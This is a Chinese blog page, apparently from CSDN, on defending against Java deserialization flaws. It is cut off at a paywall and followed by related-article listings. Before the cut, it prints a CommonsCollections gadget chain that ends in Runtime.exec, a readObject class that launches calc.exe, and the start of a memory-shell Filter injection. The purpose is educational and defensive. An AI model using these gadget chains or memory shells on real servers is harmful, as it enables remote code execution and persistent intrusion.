Java反序列化漏洞全链路防御体系

最新推荐文章于 2025-08-20 13:33:34 发布
最新推荐文章于 2025-08-20 13:33:34 发布
阅读量1.1k 收藏 16
点赞数 29
CC 4.0 BY-SA版权
分类专栏: 网安秘钥:信息安全核心技术深度解码 文章标签: java android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42358373/article/details/147718368

Java反序列化漏洞全链路防御体系

一、漏洞形成机制深度解析

Java反序列化漏洞之所以成为高危漏洞,源于其执行机制中的三个关键特性:

  1. 自动回调机制:反序列化过程中会自动调用对象的readObject方法
  2. 动态类加载:允许在运行时加载并实例化任意类
  3. 反射支持:通过反射可以突破访问限制调用敏感方法
// 典型漏洞触发流程
ObjectInputStream.readObject()
  → 恶意对象的readObject()
    → 调用链式Gadget方法
      → Method.invoke()Runtime.exec("恶意命令")

二、攻击技术全景分析

2.1 主流Gadget链详解

CommonsCollections系列
// CC6利用链构造
Transformer[] transformers = new Transformer[] {
   
   
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod", 
        new Class[]{
   
   String.class, Class[].class}, 
        new Object[]{
   
   "getRuntime", null}),
    new InvokerTransformer("invoke", 
        new Class[]{
   
   Object.class, Object[].class}, 
        new Object[]{
   
   null, null}),
    new InvokerTransformer("exec", 
        new Class[]{
   
   String.class}, 
        new Object[]{
   
   "恶意命令"})
};
JDK原生类利用
// javax.management.BadAttributeValueExpException利用
public class JdkGadget implements Serializable {
   
   
    private void readObject(ObjectInputStream in) throws Exception {
   
   
        in.defaultReadObject();
        Runtime.getRuntime().exec("calc.exe");
    }
}

2.2 新型攻击技术演进

内存马注入2.0
public class AdvancedMemoryShell implements Serializable {
   
   
    private void readObject(ObjectInputStream in) throws Exception {
   
   
        // 获取当前Web应用的Context
        WebappClassLoader loader = (WebappClassLoader) Thread.currentThread()
            .getContextClassLoader();
        StandardContext context = getField(loader, "resources");
        
        // 动态注册Filter
        FilterDef filterDef = new FilterDef(
最低0.47元/天 解锁文章
Java代码安全性的“终极武器”:自动化工具全解析,从漏洞挖掘到修复全链路实战
墨夶的博客
07-27 687
摘要: Java代码安全防护需依赖自动化工具,而非人工审计。本文解析四大核心工具: SpotBugs:通过字节码分析检测SQL注入等漏洞,支持深度安全规则扩展; SonarQube:结合600+规则识别硬编码密码等风险,支持自定义安全策略; Checkstyle:强制编码规范(如资源关闭),预防潜在漏洞; OWASP Dependency-Check:扫描第三方库漏洞(如Log4j),阻断供应攻击。 关键价值:工具集成至CI/CD,实现从开发到部署的全流程防护,避免数据泄露与恶意攻击。
Dubbo 高危漏洞!原来都是反序列化惹得祸
楼下小黑哥
07-09 1316
前言 这周收到外部合作同事推送的一篇文章,【漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞(CVE-2020-1948)通告。 按照文章披露的漏洞影响范围,可以说是当前所有的 Dubbo 的版本都有这个问题。 无独有偶,这周在 Github 自己的仓库上推送几行改动,不一会就收到 Github 安全提示,警告当前项目存在安全漏洞CVE-2018-10237。 可以看到这两个漏洞都是利用反序列化进行执行恶意代码,可能很多同学跟我当初一样,看到这个一脸懵逼。好端端的反序列化
Java反序列化CommonsCollections1
weixin_45678034的博客
08-28 283
首先cc1里是有两条的,一条是TransformerMap,另一条是LazyMap,两条的后半部分完全相同最终都是利用InvokerTransformer#transform这个函数,因为transform做了一个反射操作,如果里面的参数可被我们利用的话,我们则可以用来构建调用进行攻击Lazymap和TransformedMap的后半部分都是一样的,只不过Lazymap的子前面用到了代理,更加的巧妙,对于学习者来说是很有帮助的。白日梦组长如月专注。
Java-序列化和反序列化的详细理解
Mr_Dragon的博客
11-20 427
序列化和反序列化 一、序列化和反序列化的概念 把对象转换为字节序列的过程称为对象的序列化;把字节序列恢复为对象的过程称为对象的反序列化。 对象的序列化主要有两种用途: 1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中; 2) 在网络上传送对象的字节序列。 在很多应用中,需要对某些对象进行序列化,让它们离开内存空间,入住物理硬盘,以便长期保存。比如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一
Java反序列化漏洞利用分析:CommonsCollections3(CC3)
syjshs的博客
07-26 667
Java 反序列化漏洞,是一种攻击者通过构造恶意对象,借助目标程序中不安全的反序列化入口,执行任意代码的安全漏洞。其中,Apache Commons Collections 是最典型的 gadget 来源库之一。CommonsCollections3(简称 CC3)是一条绕过黑名单、利用类加载副作用实现命令执行的典型条,广泛用于实战与红队测试。
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞
DXfighting_的博客
04-15 3035
原理:PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 防御: 1)签名与认证。 如果序列化的内容没有用户可控参数,仅仅是服务端存储和应用,则可以通过签名认证,来避免应用接受黑客的
反序列化漏洞的运行原理及防御方法
weixin_59571541的博客
11-01 670
4. **最小化序列化和反序列化的使用**:尽量减少应用程序中序列化和反序列化的使用。8. **代码审计和安全测试**:定期对代码进行安全审计和测试,以查找和修复潜在的反序列化问题。通过降低应用程序的权限级别,可以减少攻击者造成的损害。10. **安全意识培训**:提高开发人员的安全意识,让他们了解反序列化漏洞的危害和防御方法。9. **使用安全的库和方法**:选择具有良好安全记录的序列化/反序列化库,并保持更新。1. **构造恶意输入**:攻击者利用应用程序的反序列化功能,发送经过精心构造的恶意数据。
6-java安全——java反序列化漏洞利用
网络安全
07-01 4846
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
shrio反序列化漏洞利用
02-06
### Shiro反序列化漏洞CVE-2016-4437利用方式 对于Apache Shiro框架,在处理`remember-me`功能时存在安全隐患。当应用程序使用默认密钥来加密用户信息并将其序列化保存到cookie中,攻击者能够通过特定手段篡改这个...
什么是FastJson中AutoType反序列化漏洞?
hosaos的博客
06-30 1万+
文章目录频繁出现的反序列化漏洞parse()及parseObject()AutoType及安全校验AutoType安全校验AutoType黑名单机制SafeMode安全机制攻击思路反序列化攻击模拟TemplatesImpl攻击调用路攻击类Translet生成构造攻击JSON串攻击模拟写在最后 频繁出现的反序列化漏洞 最近公司的小伙伴们收到了一波安全工单,因为FastJson存在高危漏洞,要求将FastJson版本号升级到1.2.69及以上 漏洞描述如下 在Fastjson<=1.2.68的版本中,
反序列化漏洞
最新发布
IVY20024的博客
08-20 494
反序列化漏洞是一种高危Web安全漏洞,攻击者通过构造恶意序列化数据,在目标程序反序列化过程中触发非预期操作(如远程代码执行)。漏洞原理在于程序未严格校验输入数据,利用反序列化时自动调用的方法(如Java的readObject、PHP的魔术方法)执行恶意代码。典型案例包括Java的Apache Commons Collections式调用、PHP的魔术方法文件写入、Python的pickle模块命令执行。防御措施包括:严格校验输入源、使用JSON等安全格式替代、限制可反序列化的类、加密签名数据、沙箱
网安学习路线!最详细没有之一!看了这么多分享网安学习路线的一个详细的都没有!
2401_84618514的博客
06-18 989
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
Java反序列化漏洞-CC1利用分析
柠檬i的博客
12-17 1411
Java Collections Framework 是 JDK 1.2 中的一项重要新增功能。 它添加了许多强大的数据结构,可以加速最重要的 Java 应用程序的开发。 从那时起,它已成为 Java 中公认的集合处理标准。 像许多常见的应用如Weblogic、WebSphere、Jboss、Jenkins等都使⽤了Apache Commons Collections工具库,当该工具库出现反序列化漏洞时,这些应用无一幸免。
网络安全课第六节 反序列化漏洞的检测与防御
fegus的博客
07-11 3796
上一讲介绍了 XXE 漏洞,它在业务场景中很容易用于读取敏感文件、进行代码执行,甚至也会用来渗透内网,也因此 XXE 漏洞常被当作一种严重漏洞来对待。本讲我将介绍另一种常用来实现远程代码执行的漏洞类型——反序列化漏洞,这几年经常出现在 Java 公共库,比如阿里的 fastjson,还有一些 Java 应用服务器,比如 JBoss。PHP 也有反序列化,比如著名的 Joomla 内容管理系统很多编程语言都有这种反序列化功能,若对反序列化的数据未做有效过滤和限制,就可能导致这种漏洞的产生。下面我就详细给你介绍
web反序列化漏洞原理/反序列化漏洞防护-详细白客笔记
程序员三九的博客
07-14 418
常见组件漏洞的利用原理及流量特征分析(2)1、反序列化漏洞1.1、Apache Shiro漏洞(框架漏洞)Apache Shiro是一种功能强大且易于使用的Java安全框架
网络安全-反序列化漏洞简介、攻击与防御
热门推荐
关注网络安全、云原生安全
03-13 1万+
目录 简介 PHP序列化 Python序列化 攻击 PHP举例 Python举例 防御 参考 简介 各种语言都有反序列化漏洞Java、PHP、Python等。序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象,也就是序列化的逆过程。 PHP序列化 php中序列化和反序列化函数为serialize、unserialize。 我们尝试对一些类型进行序列化 <?php // 字符串类型 $s = "a string"; $serializ
Java反序列化漏洞演示与分析POC
在信息安全领域中,Java 反序列化漏洞是较为常见的安全问题,该漏洞允许攻击者通过发送恶意序列化的数据到目标应用中,从而执行攻击者选择的代码。SerializablePoc.zip 文件中包含的示例代码(即 POC,Proof of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全息架构师

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值